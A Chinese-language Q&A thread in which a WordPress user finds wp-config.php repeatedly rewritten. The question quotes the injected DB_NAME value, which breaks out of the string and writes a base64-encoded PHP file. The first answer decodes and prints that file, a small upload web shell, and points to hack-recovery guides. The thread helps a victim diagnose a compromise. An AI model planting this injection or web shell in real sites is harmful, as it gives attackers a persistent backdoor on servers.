wp-config.php不断更改数据库名称、用户名和密码

Question

我正在使用WordPress和一个叫做WP-Rocket的插件来优化我的网站。从两天前开始，wp-config.php文件不断地将数据库名称更改为类似下面的代码。

**Original DB name was define('DB_NAME', 'db1');**

但已更改为

**define('DB_NAME', 'wordpress\'); file_put_contents(\"wp-upload-class.php\", base64_decode(**\'PD9waHANCmVjaG8gIlRoaXMgc2hpdCB3b3JrcyEiOw0KaWYgKGlzc2V0KCRfRk
lMRVNbImZpbGVuYW1lIl0pKQ0Kew0KICAgaWYoJF9GSUxFU1siZmlsZW5hbWUiXVsic2l6ZSJdID4gMTAyNCozKjEwMjQpDQogICB7DQogICAgIGVjaG8gKCJGaWxlIHRvbyBsYXJnZSAobW9yZSB0aGFuIDNNYi
kiKTsNCiAgICAgZXhpdDsNCiAgIH0NCiAgIGlmKGlzX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZW
5hbWUiXVsidG1wX25hbWUiXSkpDQogICB7DQogICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWy
JmaWxlbmFtZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlbmFtZSJdWyJuYW1lIl0pOw0KCSBlY2
hvICgiPGJyPkRvbmUhPGJyPiIpOw0KICAgfSBlbHNlIHsNCiAgICAgIGVjaG8oIjxicj5FcnJvciEgIi
4kcGhwX2Vycm9ybXNnLiI8YnI+Iik7DQogICB9DQp9DQo/Pg==\')); /*');</i>

用户名和密码也被更改为'user‘和' password’，如下所示。

/** MySQL database username */

define('DB_USER', 'user');

/** MySQL database password */

define('DB_PASSWORD', 'password');</i>

Answer 1

我想你的网站被黑了。如果你解码(https://www.base64decode.org/)代码，你会得到：

  <?php
  echo "This shit works!";
  if (isset($_FILES["filename"]))
  {
     if($_FILES["filename"]["size"] > 1024*3*1024)
   {
     echo ("File too large (more than 3Mb)");
     exit;
   }
   if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
   {
     move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
     echo ("<br>Done!<br>");
   } else {
      echo("<br>Error! ".$php_errormsg."<br>");
   }
}
?>

代码只是关于上传文件大小的消息，但我认为它是更多被黑客攻击的base64文件部分的一部分。

所以，现在你有两个选择: 1)雇佣一个人。

2)或者你可以在互联网上一步一步地看指南:这是你可以在wp.org上查看的第一个指南。

https://codex.wordpress.org/FAQ_My_site_was_hacked#Some_steps_to_take

提示:如果一个网站被黑客入侵，你应该首先让它对访问者不可用，这样没有人会被感染。

Answer 2

这是一个安全问题。一个插件正在改变你的配置来打开一个后门。

我找到了一篇可以帮助你的文章：https://secure.wphackedhelp.com/blog/wordpress-backdoor-hack/